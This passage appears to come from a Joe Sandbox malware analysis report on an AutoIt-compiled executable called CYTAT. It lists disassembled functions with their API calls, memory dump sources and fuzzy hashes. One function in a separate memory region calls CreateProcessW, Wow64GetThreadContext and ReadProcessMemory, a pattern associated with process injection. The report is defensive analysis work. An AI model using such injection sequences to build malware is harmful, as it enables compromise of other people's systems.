                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                • String ID:
                                                • API String ID: 1794320848-0
                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$CurrentTerminate
                                                • String ID:
                                                • API String ID: 2429186680-0
                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • _malloc.LIBCMT ref: 0043214B
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _malloc.LIBCMT ref: 0043215D
                                                • _malloc.LIBCMT ref: 0043216F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc$AllocateHeap
                                                • String ID:
                                                • API String ID: 680241177-0
                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 4217535847-0
                                                • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                • _free.LIBCMT ref: 004295A0
                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3938964917-2806939583
                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                Strings
                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _strcat
                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                • API String ID: 1765576173-2684727018
                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast__wsplitpath_malloc
                                                • String ID:
                                                • API String ID: 4163294574-0
                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                • _strcat.LIBCMT ref: 0040F786
                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                • String ID:
                                                • API String ID: 3199840319-0
                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FreeInfoLibraryParametersSystem
                                                • String ID:
                                                • API String ID: 3403648963-0
                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                • __lock_file.LIBCMT ref: 00414A8D
                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • __lock_file.LIBCMT ref: 00415012
                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                Function 03FC03DD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03FC0B9B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FC0C31
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FC0C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                • Instruction ID: 350799c56f8b1e9f65395089e658a9a1aee7782055697bc81330ec1ad56d7972
                                                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                • Instruction Fuzzy Hash: 0412DF24E24659C6EB24DF64D8507DEB232EF68300F1094ED910DEB7A4E77A4F81CB5A
                                                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
